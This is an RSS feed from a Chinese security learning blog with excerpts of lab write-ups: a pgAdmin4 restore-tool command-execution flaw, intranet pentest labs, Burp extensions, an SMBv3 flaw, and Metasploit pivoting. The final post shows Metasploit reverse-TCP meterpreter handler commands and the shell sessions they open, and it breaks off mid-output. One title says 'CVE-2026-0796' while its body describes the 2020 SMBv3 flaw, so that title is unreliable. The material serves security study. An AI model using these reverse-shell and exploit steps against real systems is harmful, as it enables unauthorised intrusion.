<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Rainwo&#39;s Blog</title>
    <link>https://www.rainwo.xyz/</link>
    <description>Recent content on Rainwo&#39;s Blog</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>zh-cn</language>
    <copyright>© 2026 Rainwo</copyright>
    <lastBuildDate>Sun, 31 May 2026 00:00:00 +0000</lastBuildDate><atom:link href="https://www.rainwo.xyz/index.xml" rel="self" type="application/rss+xml" />
    
    <item>
      <title>pgAdmin4 CVE-2025-13780漏洞复现</title>
      <link>https://www.rainwo.xyz/posts/pgadmin4-cve-2025-13780%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/</link>
      <pubDate>Sun, 31 May 2026 00:00:00 +0000</pubDate>
      
      <guid>https://www.rainwo.xyz/posts/pgadmin4-cve-2025-13780%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/</guid>
      <description>&lt;h2 class=&#34;relative group&#34;&gt;漏洞详情&#xA;    &lt;div id=&#34;漏洞详情&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e6%bc%8f%e6%b4%9e%e8%af%a6%e6%83%85&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h2&gt;&#xA;&lt;p&gt;pgAdmin 是一个流行且功能丰富的开源 PostgreSQL 数据库管理和开发平台，广泛被数据库管理员和开发者用于通过 Web 界面管理 PostgreSQL 数据库。&lt;/p&gt;&#xA;&lt;p&gt;该漏洞存在于 pgAdmin4 的数据库恢复（Restore）工具中，该工具使用 psql 命令行程序执行用户上传的纯文本 SQL 文件。攻击者可以利用特殊字符绕过 pgAdmin4 对文件内容的安全检查，在 SQL 文件中嵌入元命令（\!），从而通过 psql 程序在服务器上执行任意系统命令，实现远程代码执行。&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>关于</title>
      <link>https://www.rainwo.xyz/about/</link>
      <pubDate>Sun, 31 May 2026 00:00:00 +0000</pubDate>
      
      <guid>https://www.rainwo.xyz/about/</guid>
      <description>&lt;h2 class=&#34;relative group&#34;&gt;👋 关于我&#xA;    &lt;div id=&#34;-关于我&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#-%e5%85%b3%e4%ba%8e%e6%88%91&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h2&gt;&#xA;&lt;p&gt;一个安全行业的小透明，在这里记录自己的学习经历。&lt;/p&gt;&#xA;&#xA;&lt;h3 class=&#34;relative group&#34;&gt;📬 联系方式&#xA;    &lt;div id=&#34;-联系方式&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#-%e8%81%94%e7%b3%bb%e6%96%b9%e5%bc%8f&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h3&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;strong&gt;GitHub&lt;/strong&gt;: &lt;a href=&#34;https://github.com/rainwoo&#34;  target=&#34;_blank&#34; rel=&#34;noreferrer&#34;&gt;@rainwoo&lt;/a&gt;&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Email&lt;/strong&gt;: &lt;a href=&#34;mailto:hiwuyu@foxmail.com&#34; &gt;hiwuyu@foxmail.com&lt;/a&gt;&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&#xA;&lt;h3 class=&#34;relative group&#34;&gt;🛠️ 技术栈&#xA;    &lt;div id=&#34;-技术栈&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#-%e6%8a%80%e6%9c%af%e6%a0%88&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h3&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;strong&gt;静态网站生成器&lt;/strong&gt;: &lt;a href=&#34;https://gohugo.io/&#34;  target=&#34;_blank&#34; rel=&#34;noreferrer&#34;&gt;Hugo&lt;/a&gt;&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;主题&lt;/strong&gt;: &lt;a href=&#34;https://blowfish.page/&#34;  target=&#34;_blank&#34; rel=&#34;noreferrer&#34;&gt;Blowfish&lt;/a&gt;&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;配色方案&lt;/strong&gt;: Marvel（黑客风）&lt;/li&gt;&#xA;&lt;/ul&gt;</description>
      
    </item>
    
    <item>
      <title>内网渗透靶场实践</title>
      <link>https://www.rainwo.xyz/posts/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-2/</link>
      <pubDate>Sat, 10 Apr 2021 00:00:00 +0000</pubDate>
      
      <guid>https://www.rainwo.xyz/posts/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-2/</guid>
      <description>&lt;h1 class=&#34;relative group&#34;&gt;内网渗透-2&#xA;    &lt;div id=&#34;内网渗透-2&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e5%86%85%e7%bd%91%e6%b8%97%e9%80%8f-2&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h1&gt;&#xA;&lt;blockquote&gt;&lt;p&gt;公众号上HACK学习呀上面的一篇内网渗透文章，收益颇多，本篇文章实验部分为自己重现&lt;/p&gt;&#xA;&lt;p&gt;重现时遇到各式各样的奇葩问题，现均已解决&lt;/p&gt;&#xA;&lt;p&gt;原文链接：https://mp.weixin.qq.com/s/UIGYJvfNAty7ywg3EBjTJw&lt;/p&gt;&#xA;&lt;p&gt;靶场地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/6/&lt;/p&gt;&#xA;&lt;/blockquote&gt;&lt;p&gt;本次靶场渗透包括反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞。&#xA;&lt;figure&gt;&lt;img&#xA;    class=&#34;my-0 rounded-md&#34;&#xA;    loading=&#34;lazy&#34;&#xA;    decoding=&#34;async&#34;&#xA;    fetchpriority=&#34;auto&#34;&#xA;    alt=&#34;在这里插入图片描述&#34;&#xA;    width=&#34;658&#34;&#xA;    height=&#34;351&#34;&#xA;    src=&#34;https://www.rainwo.xyz/posts/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-2/80d8561aad95c2a7f7b68ad1c675a7ac.png&#34;&#xA;    srcset=&#34;https://www.rainwo.xyz/posts/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-2/80d8561aad95c2a7f7b68ad1c675a7ac.png 800w, https://www.rainwo.xyz/posts/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-2/80d8561aad95c2a7f7b68ad1c675a7ac.png 1280w&#34;&#xA;    sizes=&#34;(min-width: 768px) 50vw, 65vw&#34;&#xA;    data-zoom-src=&#34;https://www.rainwo.xyz/posts/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-2/80d8561aad95c2a7f7b68ad1c675a7ac.png&#34;&gt;&lt;/figure&gt;&#xA;&lt;/p&gt;&#xA;&#xA;&lt;h2 class=&#34;relative group&#34;&gt;知识点&#xA;    &lt;div id=&#34;知识点&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e7%9f%a5%e8%af%86%e7%82%b9&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h2&gt;&#xA;&lt;div class=&#34;highlight-wrapper&#34;&gt;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-text&#34; data-lang=&#34;text&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;st漏洞利用&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;phpmyadmin getshell&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;tomcat 漏洞利用&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;docker逃逸&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;ms14-068&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;ssh密钥利用&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;流量转发&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;历史命令信息泄露&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;域渗透&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&#xA;&#xA;&lt;h2 class=&#34;relative group&#34;&gt;环境配置&#xA;    &lt;div id=&#34;环境配置&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e7%8e%af%e5%a2%83%e9%85%8d%e7%bd%ae&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h2&gt;&#xA;&lt;p&gt;共三台靶机，导入到VMware中&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>《Python黑帽子》python3代码实现(第六章)</title>
      <link>https://www.rainwo.xyz/posts/%E7%AC%AC%E5%85%AD%E7%AB%A0-%E6%89%A9%E5%B1%95burp%E4%BB%A3%E7%90%86/</link>
      <pubDate>Sun, 27 Dec 2020 00:00:00 +0000</pubDate>
      
      <guid>https://www.rainwo.xyz/posts/%E7%AC%AC%E5%85%AD%E7%AB%A0-%E6%89%A9%E5%B1%95burp%E4%BB%A3%E7%90%86/</guid>
      <description>&lt;h1 class=&#34;relative group&#34;&gt;第六章 扩展Burp代理&#xA;    &lt;div id=&#34;第六章-扩展burp代理&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e7%ac%ac%e5%85%ad%e7%ab%a0-%e6%89%a9%e5%b1%95burp%e4%bb%a3%e7%90%86&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h1&gt;&#xA;&lt;blockquote&gt;&lt;p&gt;这一章的学习，个人感觉比前面几章稍微有难度一些，虽然过程挺艰苦的，但还算是勉强做出来了吧：）&lt;/p&gt;&#xA;&lt;/blockquote&gt;&lt;p&gt;这一章节的内容，因为jython对python3的兼容性不乐观，所以我们将使用python2编写代码。&lt;/p&gt;&#xA;&#xA;&lt;h2 class=&#34;relative group&#34;&gt;Jython？&#xA;    &lt;div id=&#34;jython&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#jython&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h2&gt;&#xA;&lt;p&gt;Jython是一种完整的语言，而不是一个Java翻译器或仅仅是一个Python&lt;a href=&#34;https://baike.baidu.com/item/%E7%BC%96%E8%AF%91%E5%99%A8/8853067&#34;  target=&#34;_blank&#34; rel=&#34;noreferrer&#34;&gt;编译器&lt;/a&gt;，它是一个Python语言在Java中的完全实现。Jython也有很多从CPython中继承的模块库。最有趣的事情是Jython不像CPython或其他任何高级语言，它提供了对其实现语言的一切存取。所以Jython不仅给你提供了Python的库，同时也提供了所有的Java类。这使其有一个巨大的资源库。&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>CVE-2026-0796漏洞复现</title>
      <link>https://www.rainwo.xyz/posts/cve2020-0796/</link>
      <pubDate>Sun, 08 Nov 2020 00:00:00 +0000</pubDate>
      
      <guid>https://www.rainwo.xyz/posts/cve2020-0796/</guid>
      <description>&lt;blockquote&gt;&lt;p&gt;即17年永恒之蓝后，又爆出永恒之黑，445不愧是安全工程师的噩梦。&lt;/p&gt;&#xA;&lt;/blockquote&gt;&#xA;&lt;h2 class=&#34;relative group&#34;&gt;漏洞简介&#xA;    &lt;div id=&#34;漏洞简介&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e6%bc%8f%e6%b4%9e%e7%ae%80%e4%bb%8b&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h2&gt;&#xA;&lt;p&gt;Microsoft Windows和Microsoft Windows Server都是美国微软（Microsoft）公司的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Server Message Block是其中的一个服务器信息传输协议。&lt;/p&gt;&#xA;&lt;p&gt;Microsoft Server Message Block 3.1.1 (SMBv3)版本中存在输入验证错误漏洞，该漏洞源于SMBv3协议在处理恶意压缩数据包时，进入了错误流程。远程未经身份验证的攻击者可利用该漏洞在应用程序中执行任意代码。以下产品及版本受到影响：Microsoft Windows 10版本1903，Windows Server版本1903，Windows 10版本1909，Windows Server版本1909。&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>MSF内网渗透</title>
      <link>https://www.rainwo.xyz/posts/msf%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/</link>
      <pubDate>Fri, 06 Nov 2020 00:00:00 +0000</pubDate>
      
      <guid>https://www.rainwo.xyz/posts/msf%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/</guid>
      <description>&lt;blockquote&gt;&lt;p&gt;本文转载自https://www.freebuf.com/articles/network/125278.html&lt;/p&gt;&#xA;&lt;p&gt;本文实操部分均为本人复现&lt;/p&gt;&#xA;&lt;/blockquote&gt;&lt;p&gt;&lt;strong&gt;纵深防御也被被称之为“多层防御”，这样的概念被运用于“信息安全”上。以多层电脑安全技术去减轻其风险，在其中有些电脑被入侵或是泄密时，风险可以大大降低。举例来说，防毒软件被安装于个人工作站上，电脑中病毒在防火墙与服务器等其它类似环境中被拦劫下来。在信息技术世界中占据着举足轻重的地位。本文我们将通过示例分析攻击者是如何运用各种方法进行网络穿透的。&lt;/strong&gt;&lt;/p&gt;&#xA;&#xA;&lt;h2 class=&#34;relative group&#34;&gt;何谓路由&#xA;    &lt;div id=&#34;何谓路由&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e4%bd%95%e8%b0%93%e8%b7%af%e7%94%b1&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h2&gt;&#xA;&lt;p&gt;确定设备如何在不同网络之间相互传输的过程，也即通过互联的网络把信息从源地址传输到目的地址的活动被称之为路由。通常用于执行路由活动的设备被称为路由器。通过使用路由表，路由器则规划网络包到各自目的地的线路。路由的功能不仅仅是诸如路由器等网络设备能够完成，在安装有该功能的任意计算机系统也能够完成。&lt;/p&gt;&#xA;&lt;p&gt;&lt;figure&gt;&lt;img&#xA;    class=&#34;my-0 rounded-md&#34;&#xA;    loading=&#34;lazy&#34;&#xA;    decoding=&#34;async&#34;&#xA;    fetchpriority=&#34;auto&#34;&#xA;    alt=&#34;在这里插入图片描述&#34;&#xA;    width=&#34;690&#34;&#xA;    height=&#34;320&#34;&#xA;    src=&#34;https://www.rainwo.xyz/posts/msf%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/fa0102dbe2af11e755d201527f81c0ab.jpeg&#34;&#xA;    srcset=&#34;https://www.rainwo.xyz/posts/msf%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/fa0102dbe2af11e755d201527f81c0ab.jpeg 800w, https://www.rainwo.xyz/posts/msf%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/fa0102dbe2af11e755d201527f81c0ab.jpeg 1280w&#34;&#xA;    sizes=&#34;(min-width: 768px) 50vw, 65vw&#34;&#xA;    data-zoom-src=&#34;https://www.rainwo.xyz/posts/msf%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/fa0102dbe2af11e755d201527f81c0ab.jpeg&#34;&gt;&lt;/figure&gt;&#xA;&lt;/p&gt;&#xA;&lt;p&gt;根据上图例子所示，为了在192.168.1.0/24与192.168.10.0/24网络之间进行通信是需要一个路由表记录的。根据路由器中的规则定义，数据需要从192.168.1.0/24源网络发到192.168.10.0/24目的网络中去。网络数据包大概会经历如下过程：&lt;/p&gt;&#xA;&lt;ol&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;要访问的IP地址是否就在本地网络？&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;是否到达目的地&lt;/li&gt;&#xA;&lt;li&gt;否则发送到网关&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;/li&gt;&#xA;&lt;li&gt;&#xA;&lt;p&gt;路由器接收到数据包就会查看其路由表&lt;/p&gt;</description>
      
    </item>
    
    <item>
      <title>MSF提权操作</title>
      <link>https://www.rainwo.xyz/posts/msf%E6%8F%90%E6%9D%83%E6%93%8D%E4%BD%9C/</link>
      <pubDate>Fri, 30 Oct 2020 00:00:00 +0000</pubDate>
      
      <guid>https://www.rainwo.xyz/posts/msf%E6%8F%90%E6%9D%83%E6%93%8D%E4%BD%9C/</guid>
      <description>&lt;blockquote&gt;&lt;p&gt;最近有个问题苦恼了我很久，“msf”是否可以控制多台服务器，怎么通过“msf”进行提权操作？&lt;/p&gt;&#xA;&lt;/blockquote&gt;&lt;p&gt;这里我直接开启了两台win7SP1X64的主机，通过运行后门的方式获得shell，这里生成shell的步骤略过。&lt;/p&gt;&#xA;&#xA;&lt;h2 class=&#34;relative group&#34;&gt;获得服务器shell&#xA;    &lt;div id=&#34;获得服务器shell&#34; class=&#34;anchor&#34;&gt;&lt;/div&gt;&#xA;    &#xA;    &lt;span&#xA;        class=&#34;absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100 select-none&#34;&gt;&#xA;        &lt;a class=&#34;text-primary-300 dark:text-neutral-700 !no-underline&#34; href=&#34;#%e8%8e%b7%e5%be%97%e6%9c%8d%e5%8a%a1%e5%99%a8shell&#34; aria-label=&#34;锚点&#34;&gt;#&lt;/a&gt;&#xA;    &lt;/span&gt;&#xA;    &#xA;&lt;/h2&gt;&#xA;&lt;p&gt;首先我们在kali里面开启msf并调用exploit/multi/handler&lt;/p&gt;&#xA;&lt;div class=&#34;highlight-wrapper&#34;&gt;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;msf5 &amp;gt; use exploit/multi/handler &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;*&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Using configured payload generic/shell_reverse_tcp&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;msf5 exploit&lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;multi/handler&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &amp;gt; &lt;span class=&#34;nb&#34;&gt;set&lt;/span&gt; payload windows/meterpreter/reverse_tcp&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;nv&#34;&gt;payload&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;=&lt;/span&gt;&amp;gt; windows/meterpreter/reverse_tcp&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;msf5 exploit&lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;multi/handler&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &amp;gt; &lt;span class=&#34;nb&#34;&gt;set&lt;/span&gt; lhost 192.168.142.19&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;nv&#34;&gt;lhost&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;=&lt;/span&gt;&amp;gt; 192.168.142.19&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;msf5 exploit&lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;multi/handler&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &amp;gt; &lt;span class=&#34;nb&#34;&gt;set&lt;/span&gt; exitonsession &lt;span class=&#34;nb&#34;&gt;false&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;nv&#34;&gt;exitonsession&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;=&lt;/span&gt;&amp;gt; &lt;span class=&#34;nb&#34;&gt;false&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;msf5 exploit&lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;multi/handler&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &amp;gt; exploit -j&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;*&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Exploit running as background job 0.&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;*&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Exploit completed, but no session was created.&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;*&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Started reverse TCP handler on 192.168.142.19:4444 &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;msf5 exploit&lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;multi/handler&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &amp;gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;*&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Sending stage &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;&lt;span class=&#34;m&#34;&gt;176195&lt;/span&gt; bytes&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; to 192.168.142.24&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;*&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Meterpreter session &lt;span class=&#34;m&#34;&gt;1&lt;/span&gt; opened &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;192.168.142.19:4444 -&amp;gt; 192.168.142.24:52612&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; at 2020-10-30 10:15:32 +0800&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;msf5 exploit&lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;multi/handler&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &amp;gt; &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;*&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Sending stage &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;&lt;span class=&#34;m&#34;&gt;176195&lt;/span&gt; bytes&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; to 192.168.142.101&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;*&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; Meterpreter session &lt;span class=&#34;m&#34;&gt;2&lt;/span&gt; opened &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;192.168.142.19:4444 -&amp;gt; 192.168.142.101:49230&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; at 2020-10-30 10:15:50 +0800&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;msf5 exploit&lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;multi/handler&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt; &amp;gt; sessions &#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Active &lt;span class=&#34;nv&#34;&gt;sessions&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;===============&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;  Id  Name  Type                     Information          Connection&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;  --  ----  ----                     -----------          